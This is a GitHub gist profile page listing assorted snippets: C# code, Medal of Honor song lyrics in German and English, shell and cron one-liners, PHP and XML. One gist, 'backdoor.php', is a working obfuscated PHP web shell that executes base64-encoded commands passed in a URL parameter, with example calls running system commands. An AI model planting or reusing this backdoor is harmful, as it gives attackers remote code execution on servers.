Skip to content

Instantly share code, notes, and snippets.

View gnysek's full-sized avatar
💭
Kuwabara! Kuwabara!

gnysek gnysek

💭
Kuwabara! Kuwabara!
View GitHub Profile
public virtual void BuildGroups() {
if (this.Columns.Count > 0) {
this.BuildGroups(this.PrimarySortColumn, this.PrimarySortOrder == SortOrder.None ? SortOrder.Ascending : this.PrimarySortOrder);
}
}
@gnysek
gnysek / moh_ger_lyrics
Created February 13, 2015 10:38
Medal of Honor Underground - Er Lasst Mich Niemals Allein
[Ansager:]
Ständig bekommen wir neue Ansagen für Kompositionen von Michael Giacchino, der, wie wir gerade erfahren haben, vor kurzem zu den Alliierten übergelaufen ist! Die Platte spielen wir jetzt für alle Liebenden, die zur Zeit voneinander getrennt sind.
...
Auf diesem Schulhof spielten wir
als wir sehr jung waren, er war fünf, ich vier.
Lachten und sangen händehaltend hier,
Ewige Liebe, die versprach er mir.
Es sollte nicht anders sein:
@gnysek
gnysek / moh_en_lyrics
Created February 13, 2015 10:39
Medal of Honor Underground - Each Night He Comes Home To Me
Here's the school yard where we'd play
When we were younger years before today
Laughing without a care to chase away
We met and vowed our love would never stray
I knew someday he would be
The one to come home to me
Here's the chapel where we wed
I won't forget the loving words we said
Though time were tough and many tears were shed
@gnysek
gnysek / to_file.sh
Created February 20, 2015 10:11
save output to file as sudo
sudo sh -c 'ls -hal /root/ > /root/test.out'
@gnysek
gnysek / SyntaxHighlighter.cs
Created March 31, 2015 13:28
SyntaxHighlighter.cs
using System.Drawing;
using System.Text.RegularExpressions;
using System.Collections.Generic;
using System.Xml;
using System.IO;
using System;
namespace FastColoredTextBoxNS
{
public class SyntaxHighlighter: IDisposable
@gnysek
gnysek / gist:c23b5bca21118546aaa0
Created May 25, 2015 13:09
scrabble array simplified
<?php
header('Content-type: text/html; charset=utf-8');
mb_internal_encoding("UTF-8");
ini_set('memory_limit', '1024M');
ini_set('max_execution_time', 500);
?>
<style>
table, td, th {
border: 1px solid black;
}
@gnysek
gnysek / temp_cron
Created June 2, 2015 05:57
Temporary files cron
0 4 * * * find /temp/folder -type f -ctime +7d -exec rm -f {} \;
@gnysek
gnysek / monokai.xml
Created September 10, 2015 07:06
Monokai GML colour
<!--This Document is generated by GameMaker, if you edit it by hand then you do so at your own risk!-->
<Colours>
<Color0>16053492</Color0>
<Color1>5056494</Color1>
<Color2>7264994</Color2>
<Color3>6123892</Color3>
<Color4>2070011</Color4>
<Color5>2070011</Color5>
<Color6>15716693</Color6>
<Color7>3006629</Color7>
@gnysek
gnysek / backdoor.php
Created September 17, 2015 05:42
backdoor
<?php
$x = strrev(base64_decode('ZWNhbHBlcl9nZXJw'));
@$x('/./e', base64_decode(${base64_decode('X0dFVA==')}['p']), '.');
/* run it as:
windows: /backdoor.php?p=c3lzdGVtKCdkaXInKTs=
linux: /backdoor.php?p=c3lzdGVtKCdscyAtbCcpOw==
*/
@gnysek
gnysek / stopUnderlyingEvents.js
Last active December 14, 2015 04:39
stop events when element is on div and both have same (click) events
.click(function(e){
e.stopPropagation()
});